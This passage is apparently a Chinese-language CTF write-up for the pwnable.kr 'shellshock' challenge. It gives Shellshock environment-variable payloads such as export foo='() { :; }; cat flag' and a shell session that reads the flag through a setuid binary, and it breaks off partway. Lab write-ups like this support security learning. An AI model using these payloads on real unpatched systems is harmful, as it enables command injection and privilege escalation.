pwnable.kr-shellshock

题目描述: Mommy, there was a shocking news about bash. I bet you already know, but lets just make it sure 🙂 ssh [email protected] -p2222 (pw:guest) shellshock.c的源码为: 顾名思义了,这题就是需要利用shellshock漏洞来获取flag,具体的讲解参见:http://www.myhack58.com/Article/html/3/62/2015/60779.htm 所以我们构造payload:export foo='() { :; }; cat flag‘直接获取flag,或者export foo='() { :; }; bash’切换成shellshock2用户的bash,然后再执行命令获取flag: [email protected]:/home/shellshock$ export foo='() { :; }; bash’ [email protected]:/home/shellshock$ ./shellshock [email protected]:/home/shellshock$ [email protected]:/home/shellshock$ [email protected]:/home/shellshock$ cat flag only if […]